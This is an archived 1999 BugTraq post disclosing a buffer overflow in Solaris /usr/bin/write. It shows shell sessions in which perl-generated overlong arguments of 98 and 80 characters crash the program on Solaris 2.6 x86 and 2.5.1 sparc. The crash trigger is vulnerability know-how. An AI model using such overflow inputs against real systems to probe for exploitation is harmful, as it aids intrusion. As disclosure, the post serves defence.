Solaris "/usr/bin/write" bug

From: bugscanat_private
Date: Sun Mar 07 1999 - 22:30:36 PST

  • Next message: Frank Miller: "Re: SMTP server account probing" 

    This is my first post to BugTraq
If this is old, I'm sorry.
when playing around with "/usr/bin/write" on Solaris 2.6 x86 , I found something
 interesting.
It's buffer overflow bug in "/usr/bin/write"
To ensure, view this command :

( Solaris 2.6 x86 )
[loveyou@/user/loveyou/buf]{30}% write loveyou `perl -e 'print "x" x 97'`
[loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 97'`
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxx permission denied
[loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 98'`
Segmentation fault

( Solaris 2.5.1(2.5) sparc )
[love]/home/love> write loveyou `perl -e 'print "x" x 79'`
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
permission denied
[love]/home/love> write loveyou `perl -e 'print "x" x 80'`
Segmentation Fault

( Solaris 2.6 and 2.7 maybe .. )

bye bye ~    :)

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:38:23 PDT